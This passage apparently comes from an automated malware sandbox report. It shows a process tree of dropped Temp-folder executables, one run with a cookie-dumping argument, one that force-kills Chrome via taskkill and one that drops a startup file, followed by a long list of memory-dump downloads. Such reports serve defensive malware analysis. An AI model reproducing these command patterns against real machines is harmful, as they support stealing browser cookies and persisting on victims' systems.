                                      PID:4720
                                  • C:\Users\Admin\AppData\Local\Temp\C781.exe
                                    C:\Users\Admin\AppData\Local\Temp\C781.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:2080
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      2⤵
                                      • Executes dropped EXE
                                      PID:4588
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1640
                                  • C:\Users\Admin\AppData\Local\Temp\CDFA.exe
                                    C:\Users\Admin\AppData\Local\Temp\CDFA.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:796
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      2⤵
                                        PID:4772
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          3⤵
                                          • Kills process with taskkill
                                          PID:3720
                                    • C:\Users\Admin\AppData\Local\Temp\9850.exe
                                      C:\Users\Admin\AppData\Local\Temp\9850.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Drops startup file
                                      PID:4876
                                    • C:\Users\Admin\AppData\Local\Temp\A438.exe
                                      C:\Users\Admin\AppData\Local\Temp\A438.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:4644

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • memory/372-38-0x0000000000400000-0x0000000000983000-memory.dmp

                                      Filesize

                                      5.5MB

                                      Download

                                    • memory/372-35-0x0000000000400000-0x0000000000983000-memory.dmp

                                      Filesize

                                      5.5MB

                                      Download

                                    • memory/1316-139-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/1464-135-0x00007FFA2B0D0000-0x00007FFA2B14E000-memory.dmp

                                      Filesize

                                      504KB

                                      Download

                                    • memory/1732-113-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/1756-42-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/1756-49-0x0000000010BF0000-0x0000000010BF1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/1756-47-0x0000000010B10000-0x0000000010B11000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/1756-44-0x0000000070B70000-0x000000007125E000-memory.dmp

                                      Filesize

                                      6.9MB

                                      Download

                                    • memory/1896-33-0x0000000010000000-0x00000000100E4000-memory.dmp

                                      Filesize

                                      912KB

                                      Download

                                    • memory/2024-103-0x0000000003960000-0x0000000003E11000-memory.dmp

                                      Filesize

                                      4.7MB

                                      Download

                                    • memory/2024-89-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/2028-158-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/2036-123-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/2092-353-0x0000000003151000-0x0000000003152000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/2092-355-0x0000000003940000-0x0000000003941000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/2092-357-0x0000000003940000-0x0000000003941000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/2652-107-0x00007FFA2B0D0000-0x00007FFA2B14E000-memory.dmp

                                      Filesize

                                      504KB

                                      Download

                                    • memory/2652-109-0x0000000010000000-0x0000000010057000-memory.dmp

                                      Filesize

                                      348KB

                                      Download

                                    • memory/2700-191-0x00000000007B0000-0x00000000007B1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/2700-190-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/2704-118-0x00007FFA2B0D0000-0x00007FFA2B14E000-memory.dmp

                                      Filesize

                                      504KB

                                      Download

                                    • memory/3128-193-0x0000000001370000-0x0000000001386000-memory.dmp

                                      Filesize

                                      88KB

                                      Download

                                    • memory/3128-411-0x0000000003490000-0x00000000034A7000-memory.dmp

                                      Filesize

                                      92KB

                                      Download

                                    • memory/3128-387-0x0000000003460000-0x0000000003476000-memory.dmp

                                      Filesize

                                      88KB

                                      Download

                                    • memory/3136-127-0x00007FFA2B0D0000-0x00007FFA2B14E000-memory.dmp

                                      Filesize

                                      504KB

                                      Download

                                    • memory/3164-91-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3164-100-0x0000000004270000-0x0000000004721000-memory.dmp

                                      Filesize

                                      4.7MB

                                      Download

                                    • memory/3304-131-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3352-148-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3356-179-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3436-58-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3436-64-0x0000000010000000-0x000000001033D000-memory.dmp

                                      Filesize

                                      3.2MB

                                      Download

                                    • memory/3448-186-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3604-53-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/3948-339-0x0000000004C40000-0x0000000004C41000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/3948-337-0x00000000031B6000-0x00000000031B7000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/3972-175-0x0000000072450000-0x00000000724E3000-memory.dmp

                                      Filesize

                                      588KB

                                      Download

                                    • memory/4100-464-0x0000000002FF6000-0x0000000002FF7000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4100-465-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4460-433-0x00000000009D0000-0x00000000009E0000-memory.dmp

                                      Filesize

                                      64KB

                                      Download

                                    • memory/4460-432-0x00000000009C0000-0x00000000009C6000-memory.dmp

                                      Filesize

                                      24KB

                                      Download

                                    • memory/4460-436-0x0000000000BE0000-0x0000000000BE7000-memory.dmp

                                      Filesize

                                      28KB

                                      Download

                                    • memory/4460-431-0x0000000004740000-0x000000000494F000-memory.dmp

                                      Filesize

                                      2.1MB

                                      Download

                                    • memory/4460-434-0x00000000009F0000-0x00000000009F5000-memory.dmp

                                      Filesize

                                      20KB

                                      Download

                                    • memory/4460-435-0x0000000008E90000-0x000000000929B000-memory.dmp

                                      Filesize

                                      4.0MB

                                      Download

                                    • memory/4460-362-0x0000000000900000-0x0000000000915000-memory.dmp

                                      Filesize

                                      84KB

                                      Download

                                    • memory/4580-218-0x0000000005070000-0x0000000005071000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4584-389-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4584-388-0x0000000003196000-0x0000000003197000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4608-385-0x00000000022C0000-0x00000000022C1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4612-211-0x0000000004E00000-0x0000000004E01000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4612-214-0x0000000004E00000-0x0000000004E85000-memory.dmp

                                      Filesize

                                      532KB

                                      Download

                                    • memory/4612-209-0x00000000033A8000-0x00000000033A9000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4640-210-0x0000000003216000-0x0000000003217000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4640-212-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4644-455-0x0000000004C20000-0x0000000004C21000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4644-454-0x00000000033E6000-0x00000000033E7000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4668-235-0x0000000003168000-0x0000000003169000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4668-237-0x0000000004D20000-0x0000000004D21000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4696-213-0x0000000010000000-0x00000000100E4000-memory.dmp

                                      Filesize

                                      912KB

                                      Download

                                    • memory/4720-390-0x0000000000400000-0x000000000040C000-memory.dmp

                                      Filesize

                                      48KB

                                      Download

                                    • memory/4724-437-0x0000000000E00000-0x0000000000EF1000-memory.dmp

                                      Filesize

                                      964KB

                                      Download

                                    • memory/4788-412-0x00000000007E0000-0x00000000007E1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4836-377-0x0000000002110000-0x0000000002111000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4876-447-0x0000000004C20000-0x0000000004C21000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4876-446-0x0000000003196000-0x0000000003197000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4984-462-0x00000000031E6000-0x00000000031E7000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/4984-463-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5028-350-0x0000000004D70000-0x0000000004D71000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-299-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-417-0x000000000AB90000-0x000000000AB91000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-319-0x0000000007600000-0x0000000007601000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-407-0x0000000009CD0000-0x0000000009CD1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-406-0x0000000009960000-0x0000000009961000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-405-0x00000000098D0000-0x00000000098D1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-404-0x0000000009810000-0x0000000009811000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-403-0x00000000091F0000-0x00000000091F1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-399-0x0000000009020000-0x0000000009021000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-297-0x0000000003366000-0x0000000003367000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-324-0x0000000007640000-0x0000000007641000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-303-0x0000000004F70000-0x0000000004F71000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-306-0x0000000070500000-0x0000000070BEE000-memory.dmp

                                      Filesize

                                      6.9MB

                                      Download

                                    • memory/5044-309-0x0000000004CA0000-0x0000000004CC3000-memory.dmp

                                      Filesize

                                      140KB

                                      Download

                                    • memory/5044-313-0x0000000004F20000-0x0000000004F42000-memory.dmp

                                      Filesize

                                      136KB

                                      Download

                                    • memory/5044-311-0x00000000076E0000-0x00000000076E1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-315-0x0000000007BE0000-0x0000000007BE1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-341-0x0000000008330000-0x0000000008331000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5044-328-0x00000000081F0000-0x00000000081F1000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5088-461-0x0000000004D80000-0x0000000004D81000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5088-459-0x00000000031F6000-0x00000000031F7000-memory.dmp

                                      Filesize

                                      4KB

                                      Download

                                    • memory/5088-460-0x0000000004D80000-0x0000000004D81000-memory.dmp

                                      Filesize

                                      4KB

                                      Download